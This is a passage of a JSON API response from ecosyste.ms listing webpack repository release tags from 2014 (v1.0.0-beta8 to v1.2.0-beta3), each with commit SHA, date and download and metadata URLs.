ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu